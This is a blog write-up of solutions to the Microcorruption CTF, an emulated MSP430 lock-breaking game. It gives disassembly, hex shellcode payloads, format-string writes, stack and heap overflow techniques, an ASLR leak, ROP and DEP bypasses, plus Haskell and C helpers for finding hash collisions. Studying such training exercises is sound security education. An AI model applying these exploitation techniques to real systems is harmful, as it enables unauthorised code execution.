Microcorruption CTF levels
Posted on September 16, 2014
I see that others have posted their writeups for microcorruption.org, so here are all of the answers I came up with. I’d like to hear about more interesting solutions or mistakes. I hope this helps you if you’re stuck.
This is a simple “find the password” level, this is how the password is checked:
44bc <check_password>
44bc: 0e43 clr r14
44be: 0d4f mov r15, r13
44c0: 0d5e add r14, r13
44c2: ee9d 0024 cmp.b @r13, 0x2400(r14)
44c6: 0520 jne #0x44d2 <check_password+0x16>
44c8: 1e53 inc r14
44ca: 3e92 cmp #0x8, r14
44cc: f823 jne #0x44be <check_password+0x2>
44ce: 1f43 mov #0x1, r15
44d0: 3041 ret
44d2: 0f43 clr r15
44d4: 3041 ret
Where the password is stored at 0x2400 by another procedure on startup. This translates roughly to:
char *secret_pass = ",0-}YX1"; // 0x2400, generated earlier
uint16_t check_pass(const char const *p){
uint16_t o = 0;
do {
if(*(p + o) != *(secret_pass + o))
return 0;
} while (++o != 0x8);
return 1;
}
Very similar to the last; it checks two bytes at time against static values.
448a <check_password>
448a: bf90 733a 0000 cmp #0x3a73, 0x0(r15) //
4490: 0d20 jnz $+0x1c
4492: bf90 7c7c 0200 cmp #0x7c7c, 0x2(r15)
4498: 0920 jnz $+0x14
449a: bf90 3172 0400 cmp #0x7231, 0x4(r15)
44a0: 0520 jne #0x44ac <check_password+0x22>
44a2: 1e43 mov #0x1, r14
44a4: bf90 3426 0600 cmp #0x2634, 0x6(r15)
44aa: 0124 jeq #0x44ae <check_password+0x24>
44ac: 0e43 clr r14
44ae: 0f4e mov r14, r15
44b0: 3041 ret
We can extract the password with a horrible one liner:
printf $(
grep r15 | grep -o '#0x....' | tr -d '#0x' |
paste -sd ''| perl -pe 's/(..)/\\x\1/g'
)
This one checks that the seventeenth byte of input is 0x11.
4552: 3f40 d344 mov #0x44d3 "Testing if password is valid.", r15
4556: b012 de45 call #0x45de <puts>
455a: f290 1100 1024 cmp.b #0x11, &0x2410
4560: 0720 jne #0x4570 <login+0x50>
4562: 3f40 f144 mov #0x44f1 "Access granted.", r15
4566: b012 de45 call #0x45de <puts>
Thus an input of seventeen bytes of \x11 will open the lock.
A format string bug, r11 points to the user supplied string:
447a: 0b12 push r11
447c: b012 c845 call #0x45c8 <printf>
4480: 2153 incd sp
4482: 3f40 0a00 mov #0xa, r15
4486: b012 5045 call #0x4550 <putchar>
448a: 8193 0000 tst 0x0(sp)
448e: 0324 jz #0x4496 <main+0x5e>
4490: b012 da44 call #0x44da <unlock_door>
This is easily exploited without DEP. The simplest value to write is already effectively a noop. In this case, 0x02 is translated to “rrc sr”.
We overwrite the jz at 0x448e with a value of 0x02 via “\x8e\x44%u%n” and the lock opens.
Our first code injection level; the bug is in the allocation sizes:
4500: 3150 f0ff add #0xfff0, sp
4504: 3f40 7c44 mov #0x447c "Enter the password ...", r15
4508: b012 a645 call #0x45a6 <puts>
450c: 3f40 9c44 mov #0x449c "Remember: passwords ...", r15
4510: b012 a645 call #0x45a6 <puts>
4514: 3e40 3000 mov #0x30, r14
4518: 0f41 mov sp, r15
451a: b012 9645 call #0x4596 <getsn>
Nowhere near enough stack space is allocated at 0x4500. Later on, 48 bytes of the users input are copied directly onto the stack. This overflows the buffer and overwrites the saved return address.
We’re allowed nulls here so this one is super simple:
mov #0xff00, sr
call #0x10
This is assembled to “324000ffb0121000” and is eight bytes long. Our exploit is therefore:
0343034303430343324000ffb0121000f643
Where “f643” is the little endian address of the shellcode on the stack and 0343 is a “noop”.
This one is a bit dumb. Instead of trying to understand what it’s doing we can single step a few instructions from the request for input interrupt and see that it is checking for the magic value. Provide that value and the lock opens.
Another obvious buffer overflow, almost exactly the same as Cusco. This time the offending user input must pass through strcpy so we can’t have nulls.
We can take the easy route and return to a function that will open the lock for us, as we control not just the return value but the stack. That’s no fun though and we can shave a few bytes off our input size if we write some shellcode without nulls.
This uses two methods for getting nulls into addresses in order to fit a shellcode that doesn’t require any help from special addresses into sixteen bytes. This is important so that we can re-use it between levels without having to tweak it.
mov #0xf010, r4
and #0x0fff, r4
mov #0xff01, sr
dec sr
call r4
To get the call gate (0x0010) into r4, we simply mask it with an and instruction. We now have only eight bytes left and still need to make the call to r4, which leaves us with eight bytes. We use four bytes to copy 0xff01 to sr, then can decrement it once with two bytes and the final two bytes to make the call. This results in:
344010f034f0ff0f324001ff12838412
Simply appending the address of our shellcode results in an open lock in the minimum possible overflowed bytes.
Nearly the same as Montevideo, just doesn’t use the strcpy, use exactly the same payload and adjust the return address.
Almost the same as Montevideo and Whitehorse, but they add a stack cookie. We are in luck though, cookie is static, only one byte is checked, and it isn’t a terminator.
So we simply use the same payload, append the cookie, then append the return address.
On this level we are given two inputs: username and password.
They are copied onto the stack with strcpy like this:
[username][password]
There is no bounds checking on either, however, if the strlen() of password is greater than sixteen the program aborts.
The easiest way around this is to overflow the username. Supplying a valid length password will add the null terminator back in.
Much like Santa Cruz, but the length check is done before the strcpy. This means that we cannot use the strcpy trick Santa Cruz. There is, however, a single byte overflow in the length check:
4600: 7f90 2100 cmp.b #0x21, r15
If you cause the length of the buffer mod 255 (0xff) to be less than 0x21, you may pick size you like.
Another format string vulnerability. Not much harder to exploit than the first. We’re probably meant to attain code execution here, however, there’s a lower hanging fruit. Simply overwrite the 0x7e here with 0x7f:
44b0 <conditional_unlock_door>
...
44c4: 0f12 push r15
44c6: 3012 7e00 push #0x7e
44ca: b012 3645 call #0x4536 <INT>
Dynamic memory management is introduced here. I’ll assume a basic understanding of glibc implements malloc. This implementation is just a little simpler, there’s no prev_size in the chunk metadata.
In contrast to the glibc implementation, which includes a previous_size, these chunk descriptors appear to be:
typedef struct chunk_ {
struct chunk_ *prev;
struct chunk_ *next;
uint16_t size;
} chunk;
We will take control of one chunk during the overwrite (six bytes). Here is a translation of the free() function that we will target:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 |
|
We control the memory p points to. As such, we can overwrite c->prev, next and size. If we point prev to our own memory, we can write any two bytes wherever we like.
Any even number for size is considered free, any odd number is in use. We are targeting line 11 by controlling the prev pointer.
Line 12 needs to be taken account of; The address of c->prev will be written back over our overwrite, possibly clobbering more than we might expect.
A straightforward ASLR level. There is a printf bug which allows us to leak an address. By comparing the data at that leaked address to the image before randomization, we find that it is the address of the printf function.
By calculating the offset from the leaked code to the _INT procedure to be 386 bytes, we can make the attack as follows:
Our input is restricted to alphanumeric characters on this level. All we need to do is search for gadgets or whole functions within that range.
One is found pretty quickly, halfway into the getsn function:
4650 <getsn>
4650: 0e12 push r14
4652: 0f12 push r15
4654: 2312 push #0x2
4656: b012 fc45 call #0x45fc <INT>
465a: 3150 0600 add #0x6, sp
465e: 3041 ret
We return to 4654 and specify a maximum input size, write address and return address as 4242. This looks like:
AAAAAAAAAAAAAAAAA | TF | BBBB | BB |
---|---|---|---|
Irrelevant bytes | Ret | Args | Ret |
Now another input will be requested, and will be returned to immediately after getsn.
This level introduces DEP, where a page is marked either executable or writeable, but never both. Our solution is almost the same as Lagos.
We simply replace the call to getsn with a call to mark_page_executable and then return to the stack, where our shellcode is now executable.
This is a step up from Algiers (the last heap corruption level) in two ways:
Neither of these are a big deal.
The program has a bug whereby targeting one bucket causes a heap overflow. To target that bucket we want complete control of the hash generated for any input data.
We don’t need exact collisions, but they’re easy enough and we’ll remove a variable whilst we’re at it. Exact collisions mean that we don’t have to fully understand the bucket offset calculation. For completeness’s sake, this is what the bucket offset code seems to do:
inline uint16_t hash_to_offset(hash_table *table, uint16_t key_hash)
{
uint16_t os;
uint16_t i;
for (os = 2, i = table->no_buckets; i > 0; i--)
os += os;
os -= 1;
os &= key_hash;
os *= 2;
}
The key_hash passed in is generated via a simple hashing function:
// 'AAAA' ==
// r0 acc == 07df
// r1 acc == fbe0
// r3 acc == 87ff
// fin acc == 7fc0 == 32704
uint16_t checksum(const char *key)
{
uint16_t acc = 0;
uint16_t v;
while (*key != '\0') {
v = *key;
v += acc;
acc = v;
acc *= 32;
acc -= v;
key++;
}
return acc;
}
Haskell was used to generate dictionary words that would fit into any bucket:
main :: IO ()
main = collisions 0x0000 >>= print
where
collisions tgt = filter ((tgt ==) . hash) <$> candidates
candidates = lines <$> readFile "/usr/share/dict/all"
hash :: String -> Word16
hash = go 0
where
go acc [] = acc
go acc (x:xs) =
let v = (fromIntegral . ord) x + acc in
go (v * 32 - v) xs
Now we can easily use the QuickCheck library to generate pseudo-random padding for any string we wish to inject.
It is now possible to perform an overwrite in free(), so long as we ensure that the forward link in the overwritten chunk is pointing to the end of the heap (a large free block). Failing to ensure this causes the malloc() call just prior to abort due to perceived heap exhaustion.
The malloc() function simply walks the circular list until it finds a free chunk of appropriate size, or until it finds that its next link is at a lower address. A lower address indicates that it has reached the join of the circle and thus the end of the list.
The disassembly of this level appears to be complete garbage due to the program jumping to an unusual offset which throws off the web based disassembler completely.
This limits us to tracing execution flow via only a few methods. We can watch the call gate at 0x10 and take note of registers set at these points, or step over hundreds or thousands of instructions at a time hoping not to miss something important. There is one last option we explore later: tracing execution step by step automatically.
Providing a non-winning input to this level executes over 280000 instructions, making a manual single-step method highly improbable to work.
Reading and comprehending such an amount of deliberately confusing assembly is going to take us days and be extremely cumbersome.
With Hollywood playing dirty like this, we shall cheat a little by downloading a MSP430 emulator.
At this point, it’s easy to see what needs to be done. We need to define the programs interaction with it’s environment. There must be an interaction, but how do we find it?
Inspecting the emulator, we can see that the random number generation implementation is quite conveniently lacking entropy:
case 0x20:
// RNG
registers[15] = 0;
break;
Given this, we can deduce that the input is read to the address 0x2600 each time on the emulated system. Unfortunately we can’t put a hardware read watchpoint on this due to the remote debugger interface coverage being minimal.
Time for a hatchet job:
set can-use-hw-watchpoints 0
break *0x10 if $r2 == 0x8200
c
watch ($r5 == 0x2604)
watch ($r6 == 0x2604)
watch ($r7 == 0x2604)
... so on
c
We start the emulator with an input of “AAAAAAAA”. Some time later gdb stops execution and we can see that it’s totally touching our bits, nice:
(gdb) i r r4
r4 0x8282 0x8282
Using the emulators trace capability and a MSP430 disassembler, we can trace execution and dig out the relevant algorithm (in AT&T syntax).
Here is a cleaned up version that is run in a loop over the input until a null is hit:
clr r4
clr r6
add @r5,r4
swpb r4
xor @r5+, r6
xor r4, r6
xor r6, r4
xor r4, r6
Now, tracing access of r4 and r6, we see that they’re untouched until later, where they’re compared against magic values:
cmp #-335, r4 ;#0xfeb1
push sp
cmp #-28008,r6 ;#0x9298
push sp
Setting these registers to the magic values via the debugger opens the lock.
It’s worth noting that I was also able to find this read loop by comparing the traces of two different input sizes. Due to the lack of randomization, the traces only differed at the point of one loop continuing further. At this point, the program with a shorter input immediately performed the cmp r4.
Creating a GDB script, we’re now able to run an input through the system and quickly see the results on r4 and r6. We have to use a bit of a dodgy hack to break on the cmp instruction, as the emulator appears to be a little buggy:
watch *(unsigned long*) $pc == 0xfeb19034
Using this feedback loop, we can quickly knock up an implementation of the checksum for reference:
hash :: String -> (Word16, Word16)
hash = algo 0 0 . map (swpb . makeWord) . chunksOf 2 . map (fromIntegral . ord)
where
makeWord (a:b:[]) = a * 0x100 + b
makeWord (a:[]) = a * 0x100
algo :: Word16 -> Word16 -> [Word16] -> (Word16, Word16)
algo r4 r6 [] = (r6, r4)
algo r4 r6 (x:xs) =
let r4' = swpb (x + r4)
r6' = xor x r6
in algo r6' r4'' xs
swpb :: Word16 -> Word16
swpb n =
let l = n .&. 0x00ff
r = n .&. 0xff00
in (l `shiftL` 8) .|. (r `shiftR` 8)
Having matched this up with the output, and proving that we can directly control either register via brute force, we must build a faster implementation to be able to control both within a reasonable time period.
A few minutes later, we have a alphanumeric string that creates the magic values in both r4 and r6 which triggers the lock. The alphanumeric restriction is for style and ease of handling only.
#include <stdio.h>
#include <time.h>
#include <stdlib.h>
#include <unistd.h>
#include <stdint.h>
#define SWAP(a,b) a ^= b; b ^= a; a ^= b;
#define SWPB(p) SWAP((p)[0], (p)[1])
#define READ16(p) (p[0] * 0x100 + p[1])
static const char alphanum[] =
"0123456789" "ABCDEFGHIJKLMNOPQRSTUVWXYZ" "abcdefghijklmnopqrstuvwxyz";
inline void hash(uint16_t * r4, uint16_t * r6, const char const *input);
inline void increment_attempt(char *attempt, size_t len);
inline void gen_random(char *s, const int len);
void main()
{
srand(time(NULL));
uint16_t r4, r6;
char attempt[12];
while (1) {
gen_random(attempt, 12);
hash(&r4, &r6, attempt);
if (r4 == 0xfeb1 && r6 == 0x9298)
printf("%2hx: %s\n", r6, attempt);
}
}
inline void gen_random(char *s, const int len)
{
int i;
for (i = 0; i < len; ++i)
s[i] = alphanum[rand() % (sizeof(alphanum) - 1)];
s[len] = 0;
}
inline void hash(uint16_t * r4, uint16_t * r6, const char const *input)
{
*r4 = 0;
*r6 = 0;
uint16_t const *p = (uint16_t *) input;
do {
if (*(char *)p == '\0' || *(char *)p + 1 == '\0')
break;
*r4 += *p;
SWPB((uint8_t *) r4);
*r6 ^= *p;
SWAP(*r6, *r4);
} while (p++);
}